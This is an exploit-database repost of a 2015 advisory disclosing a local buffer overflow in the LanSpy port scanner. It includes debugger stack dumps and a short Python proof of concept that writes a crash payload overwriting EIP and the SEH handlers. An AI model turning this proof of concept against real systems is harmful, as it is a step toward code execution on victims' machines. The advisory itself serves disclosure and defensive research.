LanSpy 2.0.0.155 – Buffer Overflow (PoC)

  • 作者: hyp3rlinx
    日期: 2015-10-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38399/
  • '''
    [+] Credits: hyp3rlinx
    
    [+] Website: hyp3rlinx.altervista.org
    
    [+] Source:
    http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt
    
    
    Vendor:
    ================================
    www.lantricks.com
    
    
    Product:
    ================================
    LanSpy.exe
    
    LanSpy is network security and port scanner, which allows getting different
    information about computer:
    Domain and NetBios names, MAC address, Server information, Domain and
    Domain controller etc....
    
    
    Vulnerability Type:
    ===================
    Buffer Overflow
    
    
    CVE Reference:
    ==============
    N/A
    
    
    Vulnerability Details:
    ======================
    
    LanSpy.exe uses an 'addresses.txt' plain text file which lives under the
    main LanSpy
    directory the file is used to load scanned IPs or URLs
    
    e.g.
    
    127.0.0.1
    
    replace addresses.txt file with our malicious one, the buffer overflow
    payload must
    be the very first entry in the text file. Next, run LanSpy.exe and click
    green arrow
    or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we
    will control
    EIP at 684 bytes also overwrite both the NSEH & SEH exception handler
    pointers...
    
    Quick stack dump...
    
    (1274.19c4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    
    eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx=00000000 esi=00000000
    edi=00000000
    eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe
    nc
    cs=0023ss=002bds=002bes=002bfs=0053gs=002b
    efl=00010246
    41414141 ?????
    0:001> g
    
    (1274.19c4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=52525252 edx=7714b4ad esi=00000000
    edi=00000000
    eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe
    nc
    cs=0023ss=002bds=002bes=002bfs=0053gs=002b
    efl=00010246
    52525252 ?????
    0:001> !exchain
    0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
    0264fe8c: 52525252
    Invalid exception stack at 42424242
    
    
    POC code(s):
    =============
    '''
    
    import os
    
    #LanSpy.exe buffer overflow POC
    #by hyp3rlinx
    #hyp3rlinx.altervista.org
    #=============================
    
    #LanSpy.exe uses an 'addresses.txt' text file
    #which lives under the LanSpy directory
    #the addresses.txt file is used to load scanned IPs or URLs
    
    #control EIP at 684 bytes... also overwrite
    #both the NSEH & SEH exception handler pointers
    #-----------------------------------------------
    
    payload="A"*684+"BBBB"+"RRRR"#<------- KABOOOOOOOOOOOOOOOOOOM!
    
    file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w")
    file.write(payload)
    file.close()
    
    
    '''
    Public Disclosure:
    ===================
    October 5, 2015
    
    
    Exploitation Technique:
    =======================
    Local
    
    
    ===========================================================
    
    [+] Disclaimer
    Permission is hereby granted for the redistribution of this advisory,
    provided that it is not altered except by reformatting it, and that due
    credit is given. Permission is explicitly given for insertion in
    vulnerability databases and similar, provided that due credit is given to
    the author.
    The author is not responsible for any misuse of the information contained
    herein and prohibits any malicious use of all security related information
    or exploits by the author or elsewhere.
    
    by hyp3rlinx
    '''